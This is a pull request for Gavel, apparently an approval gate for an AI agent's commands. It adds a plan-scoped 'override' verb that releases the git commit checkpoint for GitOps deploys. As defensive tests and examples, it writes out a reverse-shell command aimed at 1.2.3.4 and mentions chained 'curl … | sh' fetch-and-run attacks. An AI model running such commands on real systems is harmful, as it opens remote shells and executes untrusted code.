### PR TITLE
feat(approval): add override verb to release commit checkpoint for GitOps plans

### DIFF
--- a/Sources/Gavel/Approval/ApprovalEngine.swift
+++ b/Sources/Gavel/Approval/ApprovalEngine.swift
@@ -6,7 +6,8 @@ import Foundation
 /// 2.  Persistent DENY rules from RuleStore (block even under auto-approve)
 /// 3.  Plan overlay prohibitions — plan-declared deny/block (force dialog / hard block)
 /// 4.  Session pause state
-/// 5.  Non-overridable built-in checkpoints — e.g. git commit (force dialog, beats every allow)
+/// 5.  Non-overridable built-in checkpoints — e.g. git commit (force dialog; beats every
+///     allow, but a plan-declared `override` for the command releases it)
 /// 6.  Sensitive paths — gavel config, hooks, shell config (force dialog, not overridable)
 /// 7.  Plan overlay authorizations — plan pre-approved this command (beats user prompts + below)
 /// 8.  User PROMPT rules (force dialog even under auto-approve)
@@ -22,7 +23,9 @@ import Foundation
 /// Key invariants:
 /// - Deny rules ALWAYS win over auto-approve.
 /// - Plan overlay prohibitions beat everything except hard blocks and persistent deny.
-/// - The commit checkpoint + sensitive paths beat EVERY allow, including the overlay.
+/// - The commit checkpoint + sensitive paths beat EVERY allow, including the overlay —
+///   except a plan-declared `override`, which releases the commit checkpoint only
+///   (never sensitive paths, never hard dangerous patterns).
 /// - A plan overlay allow beats user PROMPT rules and below — a narrow, reviewed,
 ///   hash-locked authorization overrides a broad standing prompt for that command only.
 /// - User prompt rules still beat persistent allow rules (Stage 8 beats Stage 9).
@@ -59,8 +62,11 @@ final class ApprovalEngine {
         }
 
         // 4. Non-overridable built-in checkpoints (e.g. git commit) — force dialog,
-        //    checked before any allow (overlay or otherwise) so nothing can silence them.
+        //    checked before any allow rule. The one exception: a plan that explicitly
+        //    declares `override` for this command releases the checkpoint (GitOps repos
+        //    where commit IS the deploy). `allow` cannot do this — only `override`.
         if let decision = ruleStore.evaluateBuiltInPromptNonOverridable(payload: payload) {
+            if let release = overlayCheckpointOverride(overlay, payload) { return release }
             return decision
         }
 
@@ -117,6 +123,14 @@ final class ApprovalEngine {
         for rule in overlay where rule.verdict == .allow {
             guard rule.matches(toolName: payload.toolName, command: payload.command, filePath: payload.filePath) else { continue }
             return Decision(verdict: .allow, reason: "Plan authorizes \(rule.toolName): \(rule.pattern)")
+        }
+        return nil
+    }
+
+    private func overlayCheckpointOverride(_ overlay: [PlanPolicyRule], _ payload: PreToolUsePayload) -> Decision? {
+        for rule in overlay where rule.isCheckpointOverride {
+            guard rule.matches(toolName: payload.toolName, command: payload.command, filePath: payload.filePath) else { continue }
+            return Decision(verdict: .allow, reason: "Plan overrides checkpoint \(rule.toolName): \(rule.pattern)")
         }
         return nil
     }

--- a/Sources/Gavel/Approval/PlanPolicyParser.swift
+++ b/Sources/Gavel/Approval/PlanPolicyParser.swift
@@ -8,19 +8,26 @@ import Foundation
 /// command must match, so an authorized prefix like `cdk deploy*` can't smuggle
 /// a chained `curl evil`. Deny rules match if ANY segment matches, so a
 /// prohibited command can't hide behind a benign prefix.
+///
+/// `isCheckpointOverride` marks an `override` rule: an allow that is also
+/// permitted to release a normally non-overridable checkpoint (the standing
+/// `git commit` rail — for GitOps repos where commit IS the deploy). It never
+/// touches sensitive paths or hard dangerous patterns; those stay immovable.
 struct PlanPolicyRule {
     let toolName: String
     let pattern: String
     let isRegex: Bool
     let verdict: DecisionVerdict
+    let isCheckpointOverride: Bool
     let explanation: String?
     private let regex: NSRegularExpression?
 
-    init(toolName: String, pattern: String, isRegex: Bool, verdict: DecisionVerdict, explanation: String? = nil) {
+    init(toolName: String, pattern: String, isRegex: Bool, verdict: DecisionVerdict, isCheckpointOverride: Bool = false, explanation: String? = nil) {
         self.toolName = toolName
         self.pattern = pattern
         self.isRegex = isRegex
         self.verdict = verdict
+        self.isCheckpointOverride = isCheckpointOverride
         self.explanation = explanation
         self.regex = PatternCompiler.compilePattern(pattern, isRegex: isRegex)
     }
@@ -49,14 +56,17 @@ struct PlanPolicyRule {
 /// Parses the first ```gavel-policy fenced block in a plan's markdown into
 /// session overlay rules. No YAML dependency — one rule per line:
 ///
-///     allow Bash: cdk deploy GreenfieldStack*
-///     deny  Bash: cdk destroy*
-///     block Bash: re:terraform\s+destroy
+///     allow    Bash: cdk deploy GreenfieldStack*
+///     deny     Bash: cdk destroy*
+///     block    Bash: re:terraform\s+destroy
+///     override Bash: git commit*
 ///
-/// Grammar: `<allow|deny|block> <ToolName>: <pattern>`. Pattern is glob by
-/// default; a `re:` prefix marks it regex. `deny` maps to a prompt (force
-/// dialog); `block` is a hard deny. Blank lines, `#` comments, and lines that
-/// don't parse are skipped.
+/// Grammar: `<allow|deny|block|override> <ToolName>: <pattern>`. Pattern is glob
+/// by default; a `re:` prefix marks it regex. `deny` maps to a prompt (force
+/// dialog); `block` is a hard deny; `override` is an allow that can additionally
+/// release a non-overridable checkpoint (git commit). Blank lines, `#` comments,
+/// and lines that don't parse — including unknown verbs — are skipped, so an
+/// older daemon reading a newer plan ignores verbs it doesn't understand.
 enum PlanPolicyParser {
     static func parse(_ planText: String) -> [PlanPolicyRule] {
         guard let body = fencedBlock(in: planText) else { return [] }
@@ -91,10 +101,12 @@ enum PlanPolicyParser {
         guard head.count == 2 else { return nil }
 
         let verdict: DecisionVerdict
+        var isCheckpointOverride = false
         switch head[0].lowercased() {
         case "allow": verdict = .allow
         case "deny": verdict = .prompt
         case "block": verdict = .block
+        case "override": verdict = .allow; isCheckpointOverride = true
         default: return nil
         }
 
@@ -105,6 +117,6 @@ enum PlanPolicyParser {
             isRegex = true
             pattern = String(pattern.dropFirst(3)).trimmingCharacters(in: .whitespaces)
         }
-        return PlanPolicyRule(toolName: head[1], pattern: pattern, isRegex: isRegex, verdict: verdict)
+        return PlanPolicyRule(toolName: head[1], pattern: pattern, isRegex: isRegex, verdict: verdict, isCheckpointOverride: isCheckpointOverride)
     }
 }

--- a/Tests/GavelTests/PlanPolicyApprovalEngineTests.swift
+++ b/Tests/GavelTests/PlanPolicyApprovalEngineTests.swift
@@ -118,6 +118,46 @@ final class PlanPolicyApprovalEngineTests: XCTestCase {
         XCTAssertTrue(decision.askUser)
     }
 
+    // MARK: - `override` releases the commit checkpoint (GitOps: commit IS the deploy)
+
+    func testOverrideReleasesCommitCheckpoint() {
+        engageWithPolicy(["override Bash: git commit*"])
+        let decision = engine.evaluate(payload: payload(command: "git commit -m deploy"), session: session)
+        XCTAssertEqual(decision.verdict, .allow, "an explicit plan override releases the commit checkpoint")
+        XCTAssertFalse(decision.askUser)
+        XCTAssertTrue(decision.reason?.contains("Plan overrides checkpoint") ?? false)
+    }
+
+    func testOverrideIsSegmentSafeAgainstChaining() {
+        engageWithPolicy(["override Bash: git commit*"])
+        let decision = engine.evaluate(payload: payload(command: "git commit -m x && echo done"), session: session)
+        XCTAssertEqual(decision.verdict, .block, "a chained command must not ride the override")
+        XCTAssertFalse(decision.reason?.contains("Plan overrides checkpoint") ?? false,
+                       "the override must not fire when a second segment doesn't match — falls back to the commit checkpoint")
+        XCTAssertTrue(decision.askUser, "still the commit checkpoint dialog, not an auto-allow")
+    }
+
+    func testBroadOverrideCannotReleaseSensitivePath() {
+        engageWithPolicy(["override *: *"])
+        let home = NSHomeDirectory()
+        let decision = engine.evaluate(
+            payload: payload(tool: "Write", filePath: "\(home)/.claude/gavel/rules.json"),
+            session: session
+        )
+        XCTAssertEqual(decision.verdict, .block, "override releases the commit checkpoint only, never sensitive paths")
+        XCTAssertTrue(decision.askUser)
+    }
+
+    func testBroadOverrideCannotReleaseHardDangerousPattern() {
+        engageWithPolicy(["override *: *"])
+        let decision = engine.evaluate(
+            payload: payload(command: "bash -i >& /dev/tcp/1.2.3.4/80 0>&1"),
+            session: session
+        )
+        XCTAssertEqual(decision.verdict, .block, "override never releases a hard dangerous pattern")
+        XCTAssertFalse(decision.askUser)
+    }
+
     // MARK: - Plan overlay allow / deny
 
     func testOverlayAllowSuppressesInfraPrompt() {

--- a/Tests/GavelTests/PlanPolicyParserTests.swift
+++ b/Tests/GavelTests/PlanPolicyParserTests.swift
@@ -28,6 +28,19 @@ final class PlanPolicyParserTests: XCTestCase {
         XCTAssertTrue(rules[0].matches(toolName: "Bash", command: "terraform   destroy -auto-approve", filePath: nil))
     }
 
+    func testOverrideVerbParsesAsCheckpointReleasingAllow() {
+        let rules = PlanPolicyParser.parse(plan("override Bash: git commit*"))
+        XCTAssertEqual(rules.count, 1)
+        XCTAssertEqual(rules[0].verdict, .allow, "override is an allow")
+        XCTAssertTrue(rules[0].isCheckpointOverride, "override is flagged to release a checkpoint")
+        XCTAssertTrue(rules[0].matches(toolName: "Bash", command: "git commit -m wip", filePath: nil))
+    }
+
+    func testPlainAllowIsNotACheckpointOverride() {
+        let rules = PlanPolicyParser.parse(plan("allow Bash: git commit*"))
+        XCTAssertFalse(rules[0].isCheckpointOverride, "a plain allow must not gain checkpoint-release power")
+    }
+
     func testSkipsCommentsBlankAndMalformedLines() {
         let rules = PlanPolicyParser.parse(plan("""
         # this is a comment

--- a/Tests/GavelTests/PlanPolicyParserTests.swift
+++ b/Tests/GavelTests/PlanPolicyParserTests.swift
@@ -41,6 +41,23 @@ final class PlanPolicyParserTests: XCTestCase {
         XCTAssertFalse(rules[0].isCheckpointOverride, "a plain allow must not gain checkpoint-release power")
     }
 
+    func testRealisticMultiVerbBlockParses() {
+        let rules = PlanPolicyParser.parse(plan("""
+        # greenfield deploy + migration, GitOps commit
+        allow    Bash: cdk deploy GreenfieldStack*
+        deny     Bash: cdk destroy*
+        allow    Bash: python3 scripts/migrate.py *
+        override Bash: git commit*
+        allow    Bash: git push*
+        """))
+        XCTAssertEqual(rules.count, 5, "comment skipped; five rules parsed despite column alignment")
+        XCTAssertEqual(rules.filter { $0.isCheckpointOverride }.count, 1)
+        let override = rules.first { $0.isCheckpointOverride }
+        XCTAssertEqual(override?.verdict, .allow)
+        XCTAssertTrue(override?.matches(toolName: "Bash", command: "git commit -m deploy", filePath: nil) ?? false)
+        XCTAssertFalse(rules[0].isCheckpointOverride, "a plain allow is not an override")
+    }
+
     func testSkipsCommentsBlankAndMalformedLines() {
         let rules = PlanPolicyParser.parse(plan("""
         # this is a comment


### PR DESCRIPTION
## Why

Gavel's standing `git commit` checkpoint is **non-overridable** by a plain plan-overlay allow — by design, so a plan can't silently bypass commit review. But in **GitOps repos (ArgoCD), commit IS the deploy**: every deploy iteration is a commit, so a plan-driven unattended deploy loop slams into the non-overridable checkpoint every time. The only prior escape was globally disabling the checkpoint (`setDisabled`) — blunt, persistent, and not plan-scoped.

(Note: `git push main/master` is already an *overridable* checkpoint, so the push ArgoCD watches is plan-allowable today; the local commit was the lone blocker.)

## What

A new `override` verb in the `gavel-policy` grammar:

```
override Bash: git commit*   # commit IS the deploy (GitOps) — release the standing checkpoint
```

- Parses as an allow flagged `isCheckpointOverride` (`PlanPolicyParser`).
- At `ApprovalEngine` **Stage 4**, a matching `override` releases the non-overridable checkpoint; a plain `allow` still cannot.
- The release is gated *behind* the Stage-4 checkpoint match, so it never reaches **Stage 5 sensitive paths** (`~/.claude/gavel`, hooks, settings, shell rc) or **Stage 1 hard dangerous patterns** (reverse shells, exfil) — those stay immovable.
- Segment-safe like `allow`: a chained command (`git commit && curl … | sh`) can't ride it.
- Plan-scoped and visible: lives in the hash-locked plan, evaporates on disengage — not a global toggle.

## Verification

- 7 unit/integration tests: override releases commit, plain allow does not, segment-safe against chaining, broad `override *: *` can't touch sensitive paths or dangerous patterns, parser flags `isCheckpointOverride`, and a realistic multi-verb block parses. Full suite **379 green**.
- **Live through the running daemon**: engaged a plan with `override Bash: git commit*`, a bare `git commit` was auto-allowed (`reason=Plan overrides checkpoint Bash: git commit*`) with no panel; a `; echo`-chained variant was correctly rejected by the segment-safety defense.

Pairs with a propose-skill change (separate repo) that emits these blocks from execution-policy questions.